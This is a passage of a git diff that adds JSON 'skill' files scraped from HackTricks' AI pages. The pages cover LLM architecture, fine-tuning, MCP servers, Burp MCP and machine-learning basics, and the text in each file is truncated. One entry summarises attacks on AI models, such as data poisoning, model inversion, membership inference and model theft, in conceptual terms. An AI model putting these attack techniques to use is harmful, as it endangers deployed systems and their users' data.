",
+ "1. **Input (Tokenized Text)**: The process begins with tokenized text, which is converted into numerical representations.",
+ "2. **Token Embedding and Positional Embedding Layer**: The tokenized text is passed through a **token embedding** layer and a **positional embedding layer**, which captures the position of tokens in a sequence, critical for understanding word order.",
+ "3. **Transformer Blocks**: The model contains **12 transformer blocks**, each with multiple layers. These blocks repeat the following sequence:",
+ "- **Masked Multi-Head Attention**: Allows the model to focus on different parts of the input text at once.",
+ "- **Layer Normalization**: A normalization step to stabilize and improve training.",
+ "- **Feed Forward Layer**: Responsible for processing the information from the attention layer and making predictions about the next token."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/5.-llm-architecture.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_687702fefa18.json b/skills/ai_687702fefa18.json
new file mode 100644
index 0000000..5595158
--- /dev/null
+++ b/skills/ai_687702fefa18.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_687702fefa18",
+ "category": "AI",
+ "title": "7.1. fine tuning for classification",
+ "description": "# 7.1. Fine-Tuning for Classification\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## What is\n\nFine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new d",
+ "payloads": [
+ "# 7.1. Fine-Tuning for Classification",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## What is",
+ "Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.",
+ "> [!TIP]",
+ "> As pre-training a LLM that \"understands\" the text is pretty expensive it's usually easier and cheaper to to fine-tune open source pre-trained models to perform a specific task we want it to perform.",
+ "> [!TIP]",
+ "> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).",
+ "## Preparing the data set",
+ "### Data set size",
+ "Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_._",
+ "This data set contains much more examples of \"not spam\" that of \"spam\", therefore the book suggest to **only use as many examples of \"not spam\" as of \"spam\"** (therefore, removing from the training data all the extra examples). In this case, this was 747 examples of each.",
+ "Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.",
+ "- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.",
+ "- This means that although the data included in this data set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_7b658a04f963.json b/skills/ai_7b658a04f963.json
new file mode 100644
index 0000000..d0a9eea
--- /dev/null
+++ b/skills/ai_7b658a04f963.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_7b658a04f963",
+ "category": "AI",
+ "title": "AI Burp MCP",
+ "description": "# Burp MCP: LLM-assisted traffic review\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Overview\n\nBurp's **MCP Server** extension can expose intercepted HTTP(S) traffic to MCP-capable LLM clients so they can **reason over real requests/responses** for passive vulnerability discovery and report drafting. The intent is evidence-driven review (no fuzzing or blind scanning), keeping Burp as the source of truth.\n\n## Architecture\n\n- **Burp MCP Server (BApp)** listens on `127.0.0.1:9876` and expose",
+ "payloads": [
+ "# Burp MCP: LLM-assisted traffic review",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Burp's **MCP Server** extension can expose intercepted HTTP(S) traffic to MCP-capable LLM clients so they can **reason over real requests/responses** for passive vulnerability discovery and report drafting. The intent is evidence-driven review (no fuzzing or blind scanning), keeping Burp as the source of truth.",
+ "## Architecture",
+ "- **Burp MCP Server (BApp)** listens on `127.0.0.1:9876` and exposes intercepted traffic via MCP.",
+ "- **MCP proxy JAR** bridges stdio (client side) to Burp's MCP SSE endpoint.",
+ "- **Optional local reverse proxy** (Caddy) normalizes headers for strict MCP handshake checks.",
+ "- **Clients/backends**: Codex CLI (cloud), Gemini CLI (cloud), or Ollama (local).",
+ "## Setup",
+ "### 1) Install Burp MCP Server",
+ "Install **MCP Server** from the Burp BApp Store and verify it is listening on `127.0.0.1:9876`.",
+ "### 2) Extract the proxy JAR",
+ "In the MCP Server tab, click **Extract server proxy jar** and save `mcp-proxy.jar`.",
+ "### 3) Configure an MCP client (Codex example)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-Burp-MCP.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_8178e639fd10.json b/skills/ai_8178e639fd10.json
new file mode 100644
index 0000000..dcdc7dc
--- /dev/null
+++ b/skills/ai_8178e639fd10.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_8178e639fd10",
+ "category": "AI",
+ "title": "7.0. lora improvements in fine tuning",
+ "description": "# 7.0. LoRA Improvements in fine-tuning\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## LoRA Improvements\n\n> [!TIP]\n> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.\n\nLoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters you need to train, saving **memory** and **computational resources**. This is because:\n\n1. **Reduces the Number of Trainable Par",
+ "payloads": [
+ "# 7.0. LoRA Improvements in fine-tuning",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## LoRA Improvements",
+ "> [!TIP]",
+ "> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.",
+ "LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters you need to train, saving **memory** and **computational resources**. This is because:",
+ "1. **Reduces the Number of Trainable Parameters**: Instead of updating the entire weight matrix in the model, LoRA **splits** the weight matrix into two smaller matrices (called **A** and **B**). This makes training **faster** and requires **less memory** because fewer parameters need to be updated.",
+ "1. This is because instead of calculating the complete weight update of a layer (matrix), it approximates it to a product of 2 smaller matrices reducing the update to calculate:\\",
+ "",
+ "2. **Keeps Original Model Weights Unchanged**: LoRA allows you to keep the original model weights the same, and only updates the **new small matrices** (A and B). This is helpful because it means the model\u2019s original knowledge is preserved, and you only tweak what's necessary.",
+ "3. **Efficient Task-Specific Fine-Tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) while leaving the rest of the model as it is. This is **much more efficient** than retraining the entire model.",
+ "4. **Storage Efficiency**: After fine-tuning, instead of saving a **whole new model** for each task, you only need to store the **LoRA matrices**, which are very small compared to the entire model. This makes it easier to adapt the model to many tasks without using too much storage.",
+ "In order to implemente LoraLayers instead of Linear ones during a fine tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):",
+ "```python",
+ "import math"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_854d51e32c3f.json b/skills/ai_854d51e32c3f.json
new file mode 100644
index 0000000..4d6aa0b
--- /dev/null
+++ b/skills/ai_854d51e32c3f.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_854d51e32c3f",
+ "category": "AI",
+ "title": "0. basic llm concepts",
+ "description": "# 0. Basic LLM Concepts\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Pretraining\n\nPretraining is the foundational phase in developing a large language model (LLM) where the model is exposed to vast and diverse amounts of text data. During this stage, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of language ",
+ "payloads": [
+ "# 0. Basic LLM Concepts",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Pretraining",
+ "Pretraining is the foundational phase in developing a large language model (LLM) where the model is exposed to vast and diverse amounts of text data. During this stage, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of language and general world knowledge. This comprehensive base enables the LLM to generate coherent and contextually relevant text. Subsequently, this pretrained model can undergo fine-tuning, where it is further trained on specialized datasets to adapt its capabilities for specific tasks or domains, enhancing its performance and relevance in targeted applications.",
+ "## Main LLM components",
+ "Usually a LLM is characterised for the configuration used to train it. This are the common components when training a LLM:",
+ "- **Parameters**: Parameters are the **learnable weights and biases** in the neural network. These are the numbers that the training process adjusts to minimize the loss function and improve the model's performance on the task. LLMs usually use millions of parameters.",
+ "- **Context Length**: This is the maximum length of each sentence used to pre-train the LLM.",
+ "- **Embedding Dimension**: The size of the vector used to represent each token or word. LLMs usually sue billions of dimensions.",
+ "- **Hidden Dimension**: The size of the hidden layers in the neural network.",
+ "- **Number of Layers (Depth)**: How many layers the model has. LLMs usually use tens of layers.",
+ "- **Number of Attention Heads**: In transformer models, this is how many separate attention mechanisms are used in each layer. LLMs usually use tens of heads.",
+ "- **Dropout**: Dropout is something like the percentage of data that is removed (probabilities turn to 0) during training used to **prevent overfitting.** LLMs usually use between 0-20%.",
+ "Configuration of the GPT-2 model:",
+ "```json"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_8bdfcd9c05bf.json b/skills/ai_8bdfcd9c05bf.json
new file mode 100644
index 0000000..38e45f5
--- /dev/null
+++ b/skills/ai_8bdfcd9c05bf.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_8bdfcd9c05bf",
+ "category": "AI",
+ "title": "2. data sampling",
+ "description": "# 2. Data Sampling\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **Data Sampling**\n\n**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.\n\n> [!TIP]\n> The goal of this seco",
+ "payloads": [
+ "# 2. Data Sampling",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **Data Sampling**",
+ "**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.",
+ "> [!TIP]",
+ "> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**",
+ "### **Why Data Sampling Matters**",
+ "LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.",
+ "### **Key Concepts in Data Sampling**",
+ "1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).",
+ "2. **Sequence Length (max_length):** The number of tokens in each input sequence.",
+ "3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.",
+ "4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.",
+ "### **Step-by-Step Example**",
+ "Let's walk through an example to illustrate data sampling."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/2.-data-sampling.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_9b2c7ebbab0e.json b/skills/ai_9b2c7ebbab0e.json
new file mode 100644
index 0000000..c7034fe
--- /dev/null
+++ b/skills/ai_9b2c7ebbab0e.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_9b2c7ebbab0e",
+ "category": "AI",
+ "title": "AI MCP Servers",
+ "description": "# MCP Servers\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## What is MPC - Model Context Protocol\n\nThe [**Model Context Protocol (MCP)**](https://modelcontextprotocol.io/introduction) is an open standard that allows AI models (LLMs) to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows: for example, an IDE or chatbot can *dynamically call functions* on MCP servers as if the model naturally \"knew\" how to use them. Under the hood, MCP uses",
+ "payloads": [
+ "# MCP Servers",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## What is MPC - Model Context Protocol",
+ "The [**Model Context Protocol (MCP)**](https://modelcontextprotocol.io/introduction) is an open standard that allows AI models (LLMs) to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows: for example, an IDE or chatbot can *dynamically call functions* on MCP servers as if the model naturally \"knew\" how to use them. Under the hood, MCP uses a client-server architecture with JSON-based requests over various transports (HTTP, WebSockets, stdio, etc.).",
+ "A **host application** (e.g. Claude Desktop, Cursor IDE) runs an MCP client that connects to one or more **MCP servers**. Each server exposes a set of *tools* (functions, resources, or actions) described in a standardized schema. When the host connects, it asks the server for its available tools via a `tools/list` request; the returned tool descriptions are then inserted into the model's context so the AI knows what functions exist and how to call them.",
+ "## Basic MCP Server",
+ "We'll use Python and the official `mcp` SDK for this example. First, install the SDK and CLI:",
+ "```bash",
+ "pip3 install mcp \"mcp[cli]\"",
+ "mcp version # verify installation`",
+ "Now, create **`calculator.py`** with a basic addition tool:",
+ "```python",
+ "from mcp.server.fastmcp import FastMCP",
+ "mcp = FastMCP(\"Calculator Server\") # Initialize MCP server with a name",
+ "@mcp.tool() # Expose this function as an MCP tool"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-MCP-Servers.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_a03304b6f569.json b/skills/ai_a03304b6f569.json
new file mode 100644
index 0000000..d4a1250
--- /dev/null
+++ b/skills/ai_a03304b6f569.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_a03304b6f569",
+ "category": "AI",
+ "title": "4. attention mechanisms",
+ "description": "# 4. Attention Mechanisms\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Attention Mechanisms and Self-Attention in Neural Networks\n\nAttention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire senten",
+ "payloads": [
+ "# 4. Attention Mechanisms",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Attention Mechanisms and Self-Attention in Neural Networks",
+ "Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.",
+ "> [!TIP]",
+ "> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\\",
+ "> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.",
+ "### Understanding Attention Mechanisms",
+ "In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.",
+ "#### Example: Machine Translation",
+ "Consider translating the German sentence \"Kannst du mir helfen diesen Satz zu \u00fcbersetzen\" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.",
+ "### Introduction to Self-Attention",
+ "Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.",
+ "#### Key Concepts",
+ "- **Tokens**: Individual elements of the input sequence (e.g., words in a sentence)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/4.-attention-mechanisms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_a67ad70c3e79.json b/skills/ai_a67ad70c3e79.json
new file mode 100644
index 0000000..0353b03
--- /dev/null
+++ b/skills/ai_a67ad70c3e79.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_a67ad70c3e79",
+ "category": "AI",
+ "title": "6. pre training and loading models",
+ "description": "# 6. Pre-training & Loading models\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Text Generation\n\nIn order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.\n\nAs in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.\n\n> [!TIP]\n> The goal of this sixth phase is ve",
+ "payloads": [
+ "# 6. Pre-training & Loading models",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Text Generation",
+ "In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.",
+ "As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.",
+ "> [!TIP]",
+ "> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.",
+ "## Text Evaluation",
+ "In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.",
+ "In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**.",
+ "However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base\u202f*e*) of **7.4541e-05** is approximately **-9.5042**.\\",
+ "Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize.",
+ "Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:",
+ "
",
+ "Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\\"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_b11a935f3a45.json b/skills/ai_b11a935f3a45.json
new file mode 100644
index 0000000..2566281
--- /dev/null
+++ b/skills/ai_b11a935f3a45.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_b11a935f3a45",
+ "category": "AI",
+ "title": "1. tokenizing",
+ "description": "# 1. Tokenizing\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Tokenizing\n\n**Tokenizing** is the process of breaking down data, such as text, into smaller, manageable pieces called _tokens_. Each token is then assigned a unique numerical identifier (ID). This is a fundamental step in preparing text for processing by machine learning models, especially in natural language processing (NLP).\n\n> [!TIP]\n> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in som",
+ "payloads": [
+ "# 1. Tokenizing",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Tokenizing",
+ "**Tokenizing** is the process of breaking down data, such as text, into smaller, manageable pieces called _tokens_. Each token is then assigned a unique numerical identifier (ID). This is a fundamental step in preparing text for processing by machine learning models, especially in natural language processing (NLP).",
+ "> [!TIP]",
+ "> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**.",
+ "### **How Tokenizing Works**",
+ "1. **Splitting the Text:**",
+ "- **Basic Tokenizer:** A simple tokenizer might split text into individual words and punctuation marks, removing spaces.",
+ "- _Example:_\\",
+ "Text: `\"Hello, world!\"`\\",
+ "Tokens: `[\"Hello\", \",\", \"world\", \"!\"]`",
+ "2. **Creating a Vocabulary:**",
+ "- To convert tokens into numerical IDs, a **vocabulary** is created. This vocabulary lists all unique tokens (words and symbols) and assigns each a specific ID.",
+ "- **Special Tokens:** These are special symbols added to the vocabulary to handle various scenarios:"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-llm-architecture/1.-tokenizing.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_b9002e055eef.json b/skills/ai_b9002e055eef.json
new file mode 100644
index 0000000..4176f72
--- /dev/null
+++ b/skills/ai_b9002e055eef.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_b9002e055eef",
+ "category": "AI",
+ "title": "AI Prompts",
+ "description": "# AI Prompts\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nAI prompts are essential for guiding AI models to generate desired outputs. They can be simple or complex, depending on the task at hand. Here are some examples of basic AI prompts:\n- **Text Generation**: \"Write a short story about a robot learning to love.\"\n- **Question Answering**: \"What is the capital of France?\"\n- **Image Captioning**: \"Describe the scene in this image.\"\n- **Sentiment Analysis**: \"Analyze the",
+ "payloads": [
+ "# AI Prompts",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "AI prompts are essential for guiding AI models to generate desired outputs. They can be simple or complex, depending on the task at hand. Here are some examples of basic AI prompts:",
+ "- **Text Generation**: \"Write a short story about a robot learning to love.\"",
+ "- **Question Answering**: \"What is the capital of France?\"",
+ "- **Image Captioning**: \"Describe the scene in this image.\"",
+ "- **Sentiment Analysis**: \"Analyze the sentiment of this tweet: 'I love the new features in this app!'\"",
+ "- **Translation**: \"Translate the following sentence into Spanish: 'Hello, how are you?'\"",
+ "- **Summarization**: \"Summarize the main points of this article in one paragraph.\"",
+ "### Prompt Engineering",
+ "Prompt engineering is the process of designing and refining prompts to improve the performance of AI models. It involves understanding the model's capabilities, experimenting with different prompt structures, and iterating based on the model's responses. Here are some tips for effective prompt engineering:",
+ "- **Be Specific**: Clearly define the task and provide context to help the model understand what is expected. Moreover, use speicfic structures to indicate different parts of the prompt, such as:",
+ "- **`## Instructions`**: \"Write a short story about a robot learning to love.\"",
+ "- **`## Context`**: \"In a future where robots coexist with humans...\""
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-Prompts.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_c17b90d48828.json b/skills/ai_c17b90d48828.json
new file mode 100644
index 0000000..e0acf09
--- /dev/null
+++ b/skills/ai_c17b90d48828.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_c17b90d48828",
+ "category": "AI",
+ "title": "AI Risk Frameworks",
+ "description": "# AI Risks\n\n{{#include ../banners/hacktricks-training.md}}\n\n## OWASP Top 10 Machine Learning Vulnerabilities\n\nOwasp has identified the top 10 machine learning vulnerabilities that can affect AI systems. These vulnerabilities can lead to various security issues, including data poisoning, model inversion, and adversarial attacks. Understanding these vulnerabilities is crucial for building secure AI systems.\n\nFor an updated and detailed list of the top 10 machine learning vulnerabilities, refer to ",
+ "payloads": [
+ "# AI Risks",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## OWASP Top 10 Machine Learning Vulnerabilities",
+ "Owasp has identified the top 10 machine learning vulnerabilities that can affect AI systems. These vulnerabilities can lead to various security issues, including data poisoning, model inversion, and adversarial attacks. Understanding these vulnerabilities is crucial for building secure AI systems.",
+ "For an updated and detailed list of the top 10 machine learning vulnerabilities, refer to the [OWASP Top 10 Machine Learning Vulnerabilities](https://owasp.org/www-project-machine-learning-security-top-10/) project.",
+ "- **Input Manipulation Attack**: An attacker adds tiny, often invisible changes to **incoming data** so the model makes the wrong decision.\\",
+ "*Example*: A few specks of paint on a stop\u2011sign fool a self\u2011driving car into \"seeing\" a speed\u2011limit sign.",
+ "- **Data Poisoning Attack**: The **training set** is deliberately polluted with bad samples, teaching the model harmful rules.\\",
+ "*Example*: Malware binaries are mislabeled as \"benign\" in an antivirus training corpus, letting similar malware slip past later.",
+ "- **Model Inversion Attack**: By probing outputs, an attacker builds a **reverse model** that reconstructs sensitive features of the original inputs.\\",
+ "*Example*: Re\u2011creating a patient's MRI image from a cancer\u2011detection model's predictions.",
+ "- **Membership Inference Attack**: The adversary tests whether a **specific record** was used during training by spotting confidence differences.\\",
+ "*Example*: Confirming that a person's bank transaction appears in a fraud\u2011detection model's training data.",
+ "- **Model Theft**: Repeated querying lets an attacker learn decision boundaries and **clone the model's behavior** (and IP).\\",
+ "*Example*: Harvesting enough Q&A pairs from an ML\u2011as\u2011a\u2011Service API to build a near\u2011equivalent local model."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-Risk-Frameworks.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_dc8abcb1bc23.json b/skills/ai_dc8abcb1bc23.json
new file mode 100644
index 0000000..8987335
--- /dev/null
+++ b/skills/ai_dc8abcb1bc23.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_dc8abcb1bc23",
+ "category": "AI",
+ "title": "AI Supervised Learning Algorithms",
+ "description": "# Supervised Learning Algorithms\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nSupervised learning uses labeled data to train models that can make predictions on new, unseen inputs. In cybersecurity, supervised machine learning is widely applied to tasks such as intrusion detection (classifying network traffic as *normal* or *attack*), malware detection (distinguishing malicious software from benign), phishing detection (identifying fraudulent websites or emails), and sp",
+ "payloads": [
+ "# Supervised Learning Algorithms",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Supervised learning uses labeled data to train models that can make predictions on new, unseen inputs. In cybersecurity, supervised machine learning is widely applied to tasks such as intrusion detection (classifying network traffic as *normal* or *attack*), malware detection (distinguishing malicious software from benign), phishing detection (identifying fraudulent websites or emails), and spam filtering, among others. Each algorithm has its strengths and is suited to different types of problems (classification or regression). Below we review key supervised learning algorithms, explain how they work, and demonstrate their use on real cybersecurity datasets. We also discuss how combining models (ensemble learning) can often improve predictive performance.",
+ "## Algorithms",
+ "- **Linear Regression:** A fundamental regression algorithm for predicting numeric outcomes by fitting a linear equation to data.",
+ "- **Logistic Regression:** A classification algorithm (despite its name) that uses a logistic function to model the probability of a binary outcome.",
+ "- **Decision Trees:** Tree-structured models that split data by features to make predictions; often used for their interpretability.",
+ "- **Random Forests:** An ensemble of decision trees (via bagging) that improves accuracy and reduces overfitting.",
+ "- **Support Vector Machines (SVM):** Max-margin classifiers that find the optimal separating hyperplane; can use kernels for non-linear data.",
+ "- **Naive Bayes:** A probabilistic classifier based on Bayes' theorem with an assumption of feature independence, famously used in spam filtering.",
+ "- **k-Nearest Neighbors (k-NN):** A simple \"instance-based\" classifier that labels a sample based on the majority class of its nearest neighbors.",
+ "- **Gradient Boosting Machines:** Ensemble models (e.g., XGBoost, LightGBM) that build a strong predictor by sequentially adding weaker learners (typically decision trees).",
+ "Each section below provides an improved description of the algorithm and a **Python code example** using libraries like `pandas` and `scikit-learn` (and `PyTorch` for the neural network example). The examples use publicly available cybersecurity datasets (such as NSL-KDD for intrusion detection and a Phishing Websites dataset) and follow a consistent structure:",
+ "1. **Load the dataset** (download via URL if available)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/AI/AI-Supervised-Learning-Algorithms.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/ai_f00f4118235d.json b/skills/ai_f00f4118235d.json
new file mode 100644
index 0000000..840880f
--- /dev/null
+++ b/skills/ai_f00f4118235d.json
@@ -0,0 +1,27 @@
+{
+ "id": "ai_f00f4118235d",
+ "category": "AI",
+ "title": "AI Deep Learning",
+ "description": "# Deep Learning\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Deep Learning\n\nDeep learning is a subset of machine learning that uses neural networks with multiple layers (deep neural networks) to model complex patterns in data. It has achieved remarkable success in various domains, including computer vision, natural language processing, and speech recognition.\n\n### Neural Networks\n\nNeural networks are the building blocks of deep learning. They consist of interconnected nodes (neurons) orga",
+ "payloads": [
+ "# Deep Learning",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Deep Learning",
+ "Deep learning is a subset of machine learning that uses neural networks with multiple layers (deep neural networks) to model complex patterns in data. It has achieved remarkable success in various domains, including computer vision, natural language processing, and speech recognition.",
+ "### Neural Networks",
+ "Neural networks are the building blocks of deep learning. They consist of interconnected nodes (neurons) organized in layers. Each neuron receives inputs, applies a weighted sum, and passes the result through an activation function to produce an output. The layers can be categorized as follows:",
+ "- **Input Layer**: The first layer that receives the input data.",
